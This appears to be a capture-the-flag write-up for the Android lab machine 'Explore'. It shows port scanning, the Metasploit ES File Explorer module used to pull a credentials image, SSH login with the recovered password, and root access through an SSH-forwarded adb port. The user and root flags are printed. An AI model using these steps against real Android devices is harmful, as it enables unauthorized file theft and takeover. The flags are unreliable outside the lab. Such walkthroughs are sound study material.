[Meachines] [Easy] Explore Android ES File Explorer+adb权限提升

Information Gathering

IP Address Opening Ports
10.10.10.247 TCP:2222,38637,42135,59777

$ ip='10.10.10.247'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码
PORT      STATE SERVICE VERSION
2222/tcp  open  ssh     (protocol 2.0)
| ssh-hostkey: 
|_  2048 7190e3a7c95d836634883debb4c788fb (RSA)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
38637/tcp open  unknown
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 25 Feb 2025 13:47:31 GMT
|     Content-Length: 22
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|   GetRequest: 
|     HTTP/1.1 412 Precondition Failed
|     Date: Tue, 25 Feb 2025 13:47:31 GMT
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.0 501 Not Implemented
|     Date: Tue, 25 Feb 2025 13:47:37 GMT
|     Content-Length: 29
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Method not supported: OPTIONS
|   Help: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 25 Feb 2025 13:47:57 GMT
|     Content-Length: 26
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: HELP
|   RTSPRequest: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 25 Feb 2025 13:47:37 GMT
|     Content-Length: 39
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0
|   SSLSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 25 Feb 2025 13:47:59 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 25 Feb 2025 13:48:02 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ??random1random2random3random4
|   TerminalServerCookie: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 25 Feb 2025 13:47:59 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|_    Cookie: mstshash=nmap
42135/tcp open  http    ES File Explorer Name Response httpd
|_http-server-header: ES Name Response Server
|_http-title: Site doesn't have a title (text/html).
59777/tcp open  http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).

Android ES File Explorer

https://www.exploit-db.com/docs/english/49948-es-file-explorer-file-manager-4.1.9.7.4---paper.pdf

$ msfconsole

msf6 > use auxiliary/scanner/http/es_file_explorer_open_port

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set RHOSTS 10.10.10.247

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set action LISTPICS

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > run

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set action GETFILE

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set ACTIONITEM /storage/emulated/0/DCIM/creds.jpg

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > run

Kr1sT!5h@Rp3xPl0r3!

$ ssh -oHostKeyAlgorithms=+ssh-rsa [email protected] -p 2222

User.txt

f32017174c7c7e8f50c6da52891ae250

Privilege Escalation:adb

$ ssh -oHostKeyAlgorithms=+ssh-rsa -L 5555:localhost:5555 [email protected] -p 2222

$ adb connect 127.0.0.1:5555
$ adb root
$ adb shell

Root.txt

f04fc82b6d49b41c9b08982be59338c5

相关推荐
89315196021 分钟前
Android开发Glide做毛玻璃效果
android·glide·android开发·android教程·glide做毛玻璃效果
whysqwhw1 小时前
DRouter代码走读
android
Elasticsearch1 小时前
Elastic Security 简化了预构建 SIEM 检测规则的自定义
elasticsearch
人生游戏牛马NPC1号2 小时前
学习Android(五)玩安卓项目实战
android·kotlin
舒一笑2 小时前
一文简单记录打通K8s+Kibana流程如何启动(Windows下的Docker版本)
后端·elasticsearch·kibana
前行的小黑炭3 小时前
Android Lifecycle代码分析:为什么使用;注解的方式为什么过期?源码分析;状态与事件
android
和煦的春风3 小时前
案例分析 | SurfaceFlinger 大片Runnable引起的卡顿
android·linux
浩宇软件开发4 小时前
Android开发,实现一个简约又好看的登录页
android·java·android studio·android开发
未扬帆的小船4 小时前
在gpt的帮助下安装chales的证书,用于https在root情况下抓包
android·charles
万户猴4 小时前
【 Android蓝牙-十】Android各版本蓝牙行为变化与兼容性指南
android·蓝牙